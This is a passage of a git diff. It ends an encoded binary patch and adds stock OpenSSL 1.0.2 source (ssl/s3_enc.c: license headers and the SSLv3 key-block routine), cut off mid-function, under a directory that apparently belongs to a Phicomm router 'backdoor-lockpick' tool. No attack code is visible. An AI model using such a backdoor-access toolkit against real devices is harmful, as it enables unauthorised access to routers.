zHuu_-g^qve*x+3AP;6*o?D#}=5%hf$>lyIsIPA7dC&i9WQl;Oe(ub%)bZ5wATx7l#
zJA6s(#3jaL3U=fWJxf&8pb8A{^Vl@O*oh#~3@e)N5KXB~<2Dd8k`og5>$qEWM=v(t
z>O7o_;?5KFt=fN@YSE=2IO9YrdoAb`weYQKJw>(N#Fx4nv>p|wT61wZ*wqG8^7j2{
zf_HsA85Jgc1?$T9s4C65^m@Lv1CP6hav&~o!A(+W3>((i3D>y?I}g(qrE?E`m%Q%X
zd^T7ne-`L?H_s@i&dVLwzkow>zA`;2)qj)aUR;MKd+i121o+UqF&QS3UaT-L#CT(8
z65Cgh)pE<s&%|3Yo$nVwucKBF4*=AJyI4lky#lRarXl9RS(jj2hABu_-*9CVSM&ui
z?fOgcRc>{Y4cU7i9hGqReT4^0gj|lTEu^|w?>2nn%;QGP5cqhbwBwx~<I28&pdHb{
z{y1{N^s&(4><PCvqFwu5`ym|p4R)xDpG3Vl0SqlGvwkQ7cZ$%lPRJQ$pl4#L&~Ef1
zDZTyDg`9PR9W;|DK}s3=i^^87m|LiKW%hbhOer}*lw)g4^+x(C-X+p4-AA3AIt;&w
zz0{+qGh9jrc*e*9k=QP&2@(K{#8Ob{v6C+E=1x4)8FYRv?$%$X{gKap-2E~(o6Fta
zoqxj{9-rfAac!Y(9BWWxlmdltP+=mB1+UDy4XaKF_2}w_hSX<w&RpQLZ@-L2I_jH_
zg0lF8EA`ZYb<%pbfpPM?wU!_Cb9EDEn)Pmd+MZfSg7d(?gi8*um5!htl!<oq53NlN
zyN1vhd1~I+RJ*aLeESFXkVWXkE^H>ku0QM35d=bkQ(eaF%t4ZSPOuwYf&*O|*F+hn
zBn#WPWr>a_mZ1$A9FMo_FQ_23Aug(=HwFO{&aQPaKzoD^qtt1HbgW^}&F3^k;gaKP
zWpA5CF@%9jN#Hfg;tObO{0B1>MrY*Ww9?!4Z`7b1q8sDkIapB-JQ%^al*OAdE{F8k
zZj8$jIWD4IIf4zSncP6U|4j@DqG{1`*o8HSLhJ5<GMYYU$!Gwlu<H{rA`_4UyA2Ey
zb1|^C72sW=3@bouCzKU567g9e4!e$L?~=4Qwd##F0$V4~1C#?xQj#Ia<<ho?v2^M{
z7puec>^8iZ?mcK&)XriQ+i21zucZMW>+RYJ<LFC*{J(ZPbaR$C6OxD>_j*(!4=5uK
zap^ysY~jJ{=`5onZ2l+CnGq2Q8Dht=1OE%EAVlrjhhIIm->t`z?&N8roMuG@)gGne
zuYwR~o;9FO;vV5xIKCFA6}$J*@#njC-%9=vouGHWZH&Vk5G99{(#dxxW}$W<c0EpB
z?!se+tlsVg0QLBDg+1sN9q)(5HVUqmVmnlYbv0mPM_!9wGV%0#fI-abM8j}K*Ts&z
zF(}KyCpuoYwiBKlhs=jmnX32?3R;mD`%#d0P~oWUDhM+QX`z=j<xUa49AqPyEfH>-
z1%hxU+zTl*-SwM*>rK3HRp2ttpl%SDxE{t=Zru!vF$#+UuxIm=pm{hQV?%S;*2>AT
z8a41rV)r;ywH?O&Kt_2|HB<X$5qCETiF3vO%O0ceuqX2^><vVZaad5FxEuYVO*52%
zt|DN{)ifDm?ulNmwrmJ#)@1X1f=}`uOc^pC`R)kCI_bXJB<H3h6*UAx*~vTXWjTF{
zshXsTNDFpy{K&$scp$hk&=uR&m3O~O5B7dBJ-{*uCmYTZgwvR2gfe)iRhtA0H;;S8
z+Pm1h<Leb<{6F`hKk>QlfO#-Bba7xBV&erB3*t-8bB8V6<K3}GH+PrCZyyurxg}S(
zcIv2uP2)#T$8W^BqTw1FbiEboxnMk^AoEzz{QXDY2d~(kv9*Cg*F0Qb><jhWlG9H|
z@nLf?&=YXq85k_pT@WQ;RxC%p8bw-ij35#3F59m%Z=@*$zd_p!3OU`WA^9S2`d-Gz
zVlj-af52LxQyAtUmXyh-%$yd4TTw%|zOD(D>szP`U|EV&@pj}>uj5S`Sa<$lXe!JD
z{@|CX#Lq#?FZ@)Tn0N{WAjCKHaP-Kd2U98VnlKpBThUH}-X25#tH>u$pF=<1ZhDD8
zZjtG%M@F1<>e{|Zvcf(xx=hEc%-4)->|-Asd`*{}cooA>#k8&Vzb)<DyLE3;8s}Hg
zR6o5bCSpQKA<TxNI(3pjZ*h%0cE26HRvz}sLxbowebb1K?4x}F2SBsm6cDW@zKLg&
z>ybBv0$xg<Wz#{ST5>$hjnolcE?N4A(UmqJ_A#H^I1L5%c))$i_X_C1l}*EuZeWIp
zHq+Oys!H;lY<pG=r<m@UR{@Cdeez`l`#ON$e#f<tKSeKJ;oSxH8aS*;v`On!zW25P
z;n`^gvd^?dnfSsHSp|(b=?AOcyU{%KjEpyIZKLU#3SFtB9o|<IJxx6%^HdJ!t$D3S
zVlOq2>WutUHyP+)w|E3%-K}??q(d?9!@tL4=gD;<{{a@+&Xa!R*R^z>yjoy?M#avP
z8s)nZ2)ouzi=E8zcAbxCHg?kO-TVV&P>yNg?TSFQ&XYOFC;TEikyuUaJn5zCn>#?7
zm;iq9*wEinDcGlXLjaG7m4XLd?W`;5JQ*S4hYN%(w6`G!HwXqd5Cd8+<FW0E!JEY3
z3n+-kwg@c8yJ0-)CMF4{?+}B^&Xa!>OrOJC>^%9egrTA51*Qq?5yH^W!-Q@AEjpSY
z3F5Kks-eq>=}Rbx$BGp880sdT1=e|z+|N2+=gE{{`mm^*ujp<gx=ultTZ93*2wK9g
zcXJ~!^H9gTN9Smzc<#O%&q<twi_wO8lU@hA4fGNE)KaAlgP~$%$S92bKEl*_XCU<^
zj=RKbxpOqMuD0Pp&?NG~R*$W%fE&prmeDJOot4QO4h_ZqB!D{crfBJQfMK(-LYWj{
zze7Lx`=)r|0*InWi=7W8q)O`mbfEdc&~kihdZ%w4md?SB10*+6B96*~A(C)}2U^*j
zAfC8u(5+|zbl?Ls#iHbxw~Lf%&m%KbAnuiv092WVSiM~8i@iiA5~!`ePQ%i*7f*N?
z!b5_hPvnaz{{!Tuuvj0&0mHFUA1&<B*~6vhx}r096Lghjbq}Ez@Y1J)$A{qIAAq+C
z>9h||lINz3Sg)n%iKj3qoJ$V4fUW{`fF+gaS0V`3oRnTd0O@j&Cd6&5^lsE&+KEfi
zZ9nKbcOW*DKc<C<DHP?5$SlFAgUWVhG}0y*ZS8=*dbfb!g>CqX_0bKA%NyElhV)@~
zzPGCb)snPS2vJFbFWF3qJh1|$ecwi|pB_2Y<TQK0vA%8SKK@`soaV^Rli=IOP)LEs
z&?oyqLA*YUbpUcv63$tjI_9JOuDN3HLY{t9q$cIgAXVW*Y4<dgCN9p<!$v$q58Fv(
zkF4HDZlRx`G!L8~lm@L*`+WiG>&=3=y8|tuzDC3rR^M0k*x{4X>U1;T_`+aEFZzrB
zw2pV&#zH;zYA)#M8O4L89%Qs+u{2Mt^n!c{?2=RL{OgoIhb!>cP%U^+fikIbK%8W|
zO;SpA-<C$v_XeK&sTOss)6;>LM~05xRJ6s0)m&BucQuB_4eC!mjwk}1MgP_o(4S)U
zpUx}3CQ7<H@FSxQgjMJsY9@A4nOc9XwG|W=oFSUTYlRgkRQ5Wo<wi$B7ulzg06{oC
zA|4D~M?ZprQnBqHjj^eYO(>GDIO=A3QL3~BuF>1|ZNRpB^brAW)lzRJh}Mn;=vu75
z3t#CIUb;hSqjw3mb^t$JyxQ#T{`GOJQ!mv)O<MFcT8S@A3;@celyyVNSwX8&58|cb
zuE#-S-mTjrxZrVZ5rSr;o>)gb(V9oN2fPTGD!&qU^9J3OAsDcav#_<8Ku-QFLd-q=
z?hzhTLgxkaRzl{BNK@?yeQ(>WNL53VF{8@1K}i4qeOfSY-j{q+m#&C58Bt%!j9D{^
zuJT_S6_5T0XBN#Unmx^iZB4-Y&_YNnpSIxUrQ}ry2%{-VNnD-a*LB|_&DEaoI)B1A
z&lZ>g)wzHOkj}S%1Xd*TbT2}QY&IxzSa-;LzLJ+8chAi$*pw5<^KHlt<V}r@3FZ~K
zf1NiKKp?MRZeIS}JWpWn%fI{;$f+GNP)ZZ*AFUL>kI8%y2|7P7e>3rn=giIXZ6cl<
zh-YkUFt0Rca!y_m5HJUY%^X#9eEuML+(exRkB5oJX5tagotrmx)0jYB(FX7+j*ScE
zwd716lUED`yg-r3OKe)eX3Pk$g`;^vo(*FIiq~&)^NN9F=Vg$dkT%gk2)X`CUJ>xh
zDpx704@h2b(67+bBGS`>Q}wjXl}%4Ho+5U@?|qWTCig9Q1sih8@_eyebRy>#ml(K!
z7&y?8%@mW*MEW*;=@{R~@;sz-+80wwj_Aoz=L_<-=j0r4P&)B?Lh`bt4V*H5Lg!-q
z7UXrfb82$3D~fm>k-Ylo*U=W__*LXQ>CVnd*cH9kLg^PCd}Z(ojo6jowIJ_xcg{1O
z?92*Ky+iW)5iwkvmmhPx*X+&nh<WjZEK~E4#%jC7Zj}Al<i?cRkQ21Wsx)VoJI@!)
zD;OConxF5=IuA*C`TU%3&(DgS7SHGjO7i>{iA*I|`%hY6PDwc;h(85}&yj*;6y<<Z
zW};Qt&G;xEbSZF`hAodwN91n+zeKO-lz+NO;#WvI;iF_eM|ef~z<zQVe+EPP@%(Wl
zpQF*;_NggHqh5?o_2Q8x$EhhtqX8P7=n$WLWM(3tnGJu`0soEz{=5Ue%K`tL1O8{=
zlc4_+G7Kc;%RfP$@Q}oXKL<vClafvTiyiQ*9PqggIK3Q^jeoNPP7z`@`o|n_+Erwu
zKj?rTcECRZPWp+;DInG==x03UcQ*b$2mEpee2xPia=@26;Pi)7B<Fyf0%9G6oZoPu
z|E>f6BL{qk1O7_~{ICQ5cLzKdt|yy5&vC$g4)}Er_>B&DwF7QA;14?B4*@6r@6UtM
zkwol(-|sol|HuKSzmLkMhXW4yTMqb92mEsfd;;v7<iF)iA-*Q!6=dnuIGa4P9PsNU
zpG(iO`G}YW*~Jd@_elCD=olU8+xCyvCh<Av*no&vkbT5~&l3*#^A7kf2mEyh{NEk$
z4;=7M9q?Q%E!p%*Cu7<0^BnN$4tT%;zrz7<aKP_%z&APIk2~PcIpB1spRK<K9q@M@
z@Q)qvaR@=ko~K@D+mDD*k-Zprwsx;}z~?&PH#y)-9PoMv{C)@Abif~Vz#n(OpLM`r
z1Wx+-iO<%Lh`W(}%Yptw2mBKU+=cgXh=1c0o4<&~kv#`^HvRh?@Tm^?Ob5Kg0l&oo
zk2v6l1HR4ye;7FRxA;oCzhb|D?9&ePKbG`=k@RX0aX{kkt86}EAA#(j9r%3WfKNcE
znoZABfRmizt8M;b&w*@_1N}7)`1KC>LI?bI2fWGwZ+5^RaKImSz@K)&f9`<qbHLwm
z!2jWZk3}4oP5&1<;8!@{H#p!G4*2a3c(nuG<bZcO;14_C-*CX6cEEq^fbVs{-*Ui{
z4){q2d;+$D*~Z1^fM4N&7dzk;4tSjd9(BMsIN)D%z<=O?)60_C`ukf4JmG+A>7(4X
zwuV`el{E&AcI#`Jj7VdRQP*6pEnXa6O~<_qi&R${l{5UaXO~>7RaHi+n<7<>Et;rb
zRaaBBN>NwUv>Nrb^;MNdjW#1ZuSkn52rrx)2uBvqpT9V?B(fwhHyny+%dROZiQF70
z4+%C#Lz_P$+0<3mH))|;D<Ty)g>H}3SKFi{V@q_!s+u+FG6)c9scfx;&^4`XX}q?z
zrY2h#q_lRg>S`Jqnh6ozZ>qUB(pJ;fR^N=a7cD|lMx>^-wYgObE(tGQ4dJ*h6gV>j
zCT_L$4Gj^&Jkna(RNdT2lGrM)Z>b|WiK<HEBMtR!M#N~2tXN~z*aa=EHRw`}WNh<+
zc52!UQLnPP+M#F`<Zr5uR5n2WS|rkDRMME#t%}rE);HKaCmpucw63mcwFMmMy_9Cf
z8dRuk)f#IW<=Aq$Ata4P8#vZC;g>9@x_)I1dQeq~v8#@>)>JjOR?B`=wzk#C)-rox
zTbz`H+Y5NpKr}@g8no(}^${`>YOp2RRwsmo==HUb5`835VJM_biB>jLwl+qLH7zw_
z2&)=uDqH0s5)}=vT@!7HdTB&h3>sQp*$_o-WqghGu!yFW+{nb>QS+i5@njFBm_$?n
z<<zum^A_D+v1DO{#;c*ZYL#uos+pGNmWZ7nnSQ7#XARW&)hM(|9Vba8CqXasjg_$7
zDoxCqw#wDebN$N7hLvqL($d;oMSWFZda4N?O0i=0*~3V(vl$RE>Z?}O7(x$ib(J%(
z`J%`M#bBpvh*5x@8PPUv?$Y`29gWpd=@OW!RW~=)*p-BV%87)D9I0u?7&fh}(G~@6
z4$3*OXmNn%c|(0wq^7B=bxn(*EvyLLOmm0^w5g2^4;t}Dg1Q#eg%@axQ1d|@M%z@=
z3jY%!Z-M8k=0?otkw>A0xi`bi8Y3&}4G4d8WJS}=72NI2Te3_jf5a4|Fc{r>TQR~r
zRl^=h{p6f#YFdSw%7YQAUDaAcE^y)88zW8i)ic{{pGJDIC(VjAO>kUHv1N+0t>>jJ
zaJamDetlDA19Zk4sfL}jHZzwfS~gl61d$L?X>p_{M3Oc>J|^}&;`~SV76#RnRsbx+
zugxu67^$N6$QEY`cR^;?R9#nzDNAkIy`j!2*%yP2=!`~#O-!|*%8W=UV0u#Oq`_C#
zC07cXZD<NUZ)J09y;0X_&obsw>{)6zb6*YFLR&q4F>P%hG};Owgis98)665gsE1)d
zK3xEIC+*g0yyX;2D_d}9Qj=lSHdJC}5>KYzTZJRDwIHMs<In^*AHnoB#KHvk+8ntT
z9TNi6gPc3I`&)79q+&f6t4<UyI2%?0tA%mhgy|s~Z;l$Y;MshYTgCd{+|*Q4WoSk{
z3{}igxHGIRSQwj{$*olyv|iHOBsU<|Tro>qg+C|{mD_5BZ=n3j)@I>%X{9ovEs+(`
z+FG?9lA%TJT~UvvP@uM40>x@m-$u(zV`Y`FH?<nb70>n|YDH~psi|U$QI&0oX5VN;
z_!P)OhOk07YVu?xt(qbtlPOvxDrTp>@Y%fOqC!y<)*Txg;St4}fQHeD+Gtai(3(&@
ze1u#{VNR>;N+TnV{?$c|>gIdJDmM%3LQ~DkW}}`oEo+YecJO4w)XPRJ0G05pBdw%E
zj9Io#aiF@st)<eas*}-!s3c~!%(dHdTs#r?jCeud!hr0hP{k28j;I7{s4WS(T)VP}
z5@hHpYS{!(Q)RRPt1C<nR!O#nKomYqgr7tcN$YZTbA6^ltFSVz5Rnf#B_TkS0r5w{
z^iB^Y9AAsuq)+h%8Kv(Fl<wMSU#)2hKg4i4QdKzp>wlDpp6+QCKAGWkbgFQ=Z=po=
zbVRD~Qi*5EBi>t)^yf1AvxyLi_?(B2;xmQebT_B)FEgCZCKSGv;dHd7@C`UurbPVd
zU&&DT*BO2>!(U;zkKrFN{1S$bC&ozhb16QGe>KCWFnl4-1u0Q6@9!fF=lvRBIM>4w
zhI2ksaqdMalmDj-zYOI{&YN&fLy73WfRDnP9dJ4aqD1t39N%L&=f42w5R{1ia(op3
zMGT+Ha5@*Elqo-*XDECcGK$X>?57pZ^>7`-uVD0a4v~#M=74WyI3M31GMtZZ8}_N$
z`1dfJj@Fd?KVmqSzf4{MXX>Gz;dB(I_&mmN&S#$k{szNmFg|~0IOpS*7qcV}9nq<F
zr!c&T;Wsdx^C@GvpV8mU@R<y6V>ta?i)wcZ!)G)6afWk0c8KBh@31L8?=$?13_tG-
zJRoK2e=ftXMY-bB#Bko<jS?sKL|1T%{u_**-dI-na||zG`0pI>cOCc-GkVT{y1WOZ
zesTV-4Ci(pV>tKo7Q;E8M<q^kj^p2C^j~8AdY<8Y9^EQm#2`7RG5Y%$&gFdG0YAWS
zJ}&>kaC+B8>Hk7`C`IkgVR*U3GskfeqraZff5vbwXE|OUr9}KW{uPGbfHEb|8itoL
zoZiEyl*#8c2mDVApMiRc|1=puWb&EIaIUv9iPQK77@tLqo{#Un44=#BpI|uG!vP2U
z4-EG+J|1~5oGH&45~qG~d9G(Tx3`}&ocH%v4CiuIkaIyI{@hNY5_bb9(^h(3%jmhC
zY-c!c_je2rGCs!`9%A@Jd9O|K@P0kXaL)ga4CnIymEj8*f3Lg;C;psI!~wsT;aqPI
zGn~trVmPNSkoWAF?fMzc`Mkz(QkByG#|)>Y6h4Vwrb8nBH{zr4B@Dlb;Xh$`nBj*R
z&gDPnTo54<e=g5-hL@vEwfjYeb2(QsoYOzR@S7Q*#~Hqm;Xh({1;h6+{1%4)k>PyY
z-(xtZ_Y)Bk^>-0Is$aJ<d@;lCVL0dWJ%)3=^)Y-2<FlXPOBsHU;e32QWB9F%eyn^E
zkmTon=5&VN#^?(ezKr2MhTqQc=?uSv;qw`OC&Mcp@cS8l7o(3c{BDMShvD}y{9T4e
z7+y}B5G2wAr>|!Ca+Im@{W`<B-9E!`J}-7NoQ6X2nRFo@kf>cguU9gB1<DltQw-<!
z@I!`IG5Q}fyqe*^VmR;bCk*HI@a2n88Hwbq!AHq+8^dcE-oWsc41a{-cQX80hSxFt
z7Yyfd(V4V~MIw3X@lo;=F`Vn!VE9)U{XvGWV)zmt9*~HC13rrXT|PV@5xyKBh2Q7H
z15zgadY^z#p?{L$eB7tdW*dq4aQPQ9oco7+7~X_BN}f7~bNhUXj1r0XH{+w|KW2Cf
z!{?K5NSX31V>q|-=NZoJ_VU8)d>R?v3KAvHcNxz8<bH<FWb~ggyp7>2XmgH~ix1c5
zdWIV)Q|%sgz|Wz>0;Ehna~aOZ<$i|qcDFD*3Vy2He`PqQA47)-NSW>W7|!Ki=YW6Y
zfS*f;5n1@(#&F)Re`YwB^KFK&20zuWlMJtB_$->tNYt-;@lo{8F}$7OhZw$+;U6=c
z`;$o&AR`ffj(@=cFJ|~%sH5b$m*Hy|{yf9E9$sZQm-9V_b9r*7gDFy`oCOZ}6%4-*
z^^}}T8Q#e7R)%vqw>se8VmS93&oZ3*!vhTGe&A0G=X^e7IG^vIF`Uo$aaWRdZ2j<d
zFJ(CQpB-1F>A5_wGJGval-@pL_&SD9qD><bjY|hUihef3xjyGHyoAv&VmQ}B55u{f
zZ!^4;@%fbDyxqL3L4-tdaz58Foa?8B;W5-v{o2UzE{1PnIFAP&VR$#Af05xE82$>w
zH!}R!4CnNpP-95cuO57qoRi4uBN1-mqwp^<{2_)HGu&dh&hSkP-^6g*;wb*T439JX
z6^0iw{K{E)Kq5KGv=yILhJTgeTNvKR@FyAmWrn}NaGl|QVfcd#chANH63J7BkCNxh
z46kH(CBru}{BI1upW&BZg9jwy|1ds^|5FT~$MF3OpU?1NhHqi`)nCK|67jFWNAbUt
z;g2x9p5c!&yqn?wgW=z2_&+gxP~vW2>lr@gT09_;JbXR|8P4VWCx&x*1{u!hsSF1M
z|A}Zr_4hFIdk-+&gFGb{K3hf3{*uRX0{<Gr<@R0RUuU>a=84Z^442EepeH@3R3tM*
z{|yD=x0vDIWOymVA7?n(FeT#igvi-n6*5owlMG+R@PB6ba)y74;dKn(#_$$~f1Ba$
z41bE@9Sr{t!+RM1G{d(r{JRWSx}|>o3&Xd`JmKGC_%jSwd4jex{8^c&pI(NO?W!~&
zGsOS<3dHXLhW~)!uQU8Ph96@14;enh@E<YUC-Wo=mq)r2ff0Vbq|-C#W%wl40xD8`
z)Zfu5n^Cy>JG!9^KI-qs=zl9nNztpn*J{te)!z~A%fQv&=g_|v!TG4ax4A9@SASQt
zBm-A}SF<exSAQ?@eg^&%pWR+@j{Qr;^il8kcV*z}J@{=IxO(6Hry00<-~C7iuHIAE
zX0)woG%8o%*J!nW>r}3_rlE3%L9aW`pchWH87tb_v>C0<;_Xuq`Dgg?NJIib4u#qb
zyyDe}_gA$UP0dEl4E*u^RpJFm`Mk0zIs>oOwBUuIHL`Y19bW997qI>>Bp-Ot(2mXE
zRVtr<EB&)7mS&(Hg}u@mP&$IxnW1I&uR1R~1CLbKW5Zg3{3Sn6xKy`9@s2_9NOn{v
zvwd0)i0A)qeG0RPrwn6|vy*E7GzG|C)xP=-0jGRs`#vfEk&ODjjOS83XVc&DHk(k*
z3(_BrQKtSD0i*Vd@ZrfrK{%4!R@e{tR&uM~I~g`Ygv=~ipJS9)^%TAenQ{2YX{unY
zSl0KAAa+K{uizLm#51%0GF6|H!%}8_it)1P@3GZ(CG~GBk^WA{N7YyMm#uB8**=H9
vHLWh+{>{S=Wi#uK2bMYZRAZ=|zLBU=mNNB6u}!x6%iHZraaNbInf3oC+qybU

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_enc.c
new file mode 100644
index 0000000..cdbf0f0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_enc.c
@@ -0,0 +1,951 @@
+/* ssl/s3_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2005 Nokia. All rights reserved.
+ *
+ * The portions of the attached software ("Contribution") is developed by
+ * Nokia Corporation and is licensed pursuant to the OpenSSL open source
+ * license.
+ *
+ * The Contribution, originally written by Mika Kousa and Pasi Eronen of
+ * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+ * support (see RFC 4279) to OpenSSL.
+ *
+ * No patent licenses or other rights except those expressly stated in
+ * the OpenSSL open source license shall be deemed granted or received
+ * expressly, by implication, estoppel, or otherwise.
+ *
+ * No assurances are provided by Nokia that the Contribution does not
+ * infringe the patent or other intellectual property rights of any third
+ * party or that the license provides you with all the necessary rights
+ * to make use of the Contribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+ * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+ * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+ * OTHERWISE.
+ */
+
+#include <stdio.h>
+#include "ssl_locl.h"
+#include <openssl/evp.h>
+#include <openssl/md5.h>
+
+static unsigned char ssl3_pad_1[48] = {
+    0x36, 0x36, 0x36, 0x36, 0x36, 0x36, 0x36, 0x36,
+    0x36, 0x36, 0x36, 0x36, 0x36, 0x36, 0x36, 0x36,
+    0x36, 0x36, 0x36, 0x36, 0x36, 0x36, 0x36, 0x36,
+    0x36, 0x36, 0x36, 0x36, 0x36, 0x36, 0x36, 0x36,
+    0x36, 0x36, 0x36, 0x36, 0x36, 0x36, 0x36, 0x36,
+    0x36, 0x36, 0x36, 0x36, 0x36, 0x36, 0x36, 0x36
+};
+
+static unsigned char ssl3_pad_2[48] = {
+    0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c,
+    0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c,
+    0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c,
+    0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c,
+    0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c,
+    0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c, 0x5c
+};
+
+static int ssl3_handshake_mac(SSL *s, int md_nid,
+                              const char *sender, int len, unsigned char *p);
+static int ssl3_generate_key_block(SSL *s, unsigned char *km, int num)
+{
+    EVP_MD_CTX m5;
+    EVP_MD_CTX s1;
+    unsigned char buf[16], smd[SHA_DIGEST_LENGTH];
+    unsigned char c = 'A';
+    unsigned int i, j, k;
+
+#ifdef CHARSET_EBCDIC
+    c = os_toascii[c];          /* 'A' in ASCII */
+#endif
+    k = 0;
+    EVP_MD_CTX_init(&m5);
+    EVP_MD_CTX_set_flags(&m5, EVP_MD_CTX_FLAG_NON_FIPS_ALLOW);
+    EVP_MD_CTX_init(&s1);
+    for (i = 0; (int)i < num; i += MD5_DIGEST_LENGTH) {
+        k++;
+        if (k > sizeof buf) {
+            /* bug: 'buf' is too small for this ciphersuite */
+            SSLerr(SSL_F_SSL3_GENERATE_KEY_BLOCK, ERR_R_INTERNAL_ERROR);
+            return 0;
+        }
+
+        for (j = 0; j < k; j++)
+            buf[j] = c;
+        c++;
+        EVP_DigestInit_ex(&s1, EVP_sha1(), NULL);
+        EVP_DigestUpdate(&s1, buf, k);
+        EVP_DigestUpdate(&s1, s->session->master_key,
+                         s->session->master_key_length);
+        EVP_DigestUpdate(&s1, s->s3->server_random, SSL3_RANDOM_SIZE);
